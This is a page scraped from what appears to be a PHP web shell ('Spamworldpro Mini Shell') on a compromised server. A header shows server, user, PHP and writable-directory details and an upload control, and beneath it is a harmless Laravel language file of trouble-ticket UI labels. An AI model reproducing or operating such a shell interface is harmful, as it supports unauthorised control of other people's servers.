Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/medad.corals.io/Corals/modules/TroubleTicket/resources/lang/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/medad.corals.io/Corals/modules/TroubleTicket/resources/lang/en/labels.php
<?php

return [
    'trouble_ticket' => [
        'update_status' => 'Update Status',
        'want_to_delete' => 'You are going to delete selected records?',
        'archive' => '<i class="fa fa-fw fa-archive"></i> Archive',
        'unarchive' => '<i class="fa fa-fw fa-archive"></i> Unarchive',
        'archive_confirmation' => 'You are going to Archive the selected records?',
        'unarchive_confirmation' => 'You are going to Unarchive the selected records?',
        'public_owner' => 'Is Public',
        'attachment' => 'Support Ticket Attachments',
        're_open' => '<i class="fa fa-unlock fa-fw"></i> Reopen ticket',
        'resolve' => '<i class="fa fa-check fa-fw"></i> Resolve ticket',
        'copy_tt_public_url' => 'Copy Public URL',
        'estimated_hours' => '{1} :hours hour|[2,*] :hours hours',
        'public_url' => 'Copy Support Ticket Public URL',
        'attachments' => 'Attachments'
    ],
    'team' => [
        'notifications_channels' => 'Notification channels'
    ],
    'issue_type' => [
        'solutions' => 'Suggested Solutions',
        'add_new_solution' => '<i class="fa fa-plus fa-fw"></i> Add new solution',
        'remove' => '<i class="fa fa-remove fa-fw"></i> Remove'
    ],
    'comment' => [
        'comments_list' => '<i class="fa fa-comments-o fa-fw"></i> Comments',
        'add_new_comment' => '<i class="fa fa-commenting-o fa-fw"></i> Add new comment',
        'no_comments' => 'No Comments Yet',
    ],
    'history' => [
        'activities' => '<i class="fa fa-history"></i> History',
        'old' => 'Old',
        'changed_to' => 'Changed to'
    ],
];

Spamworldpro Mini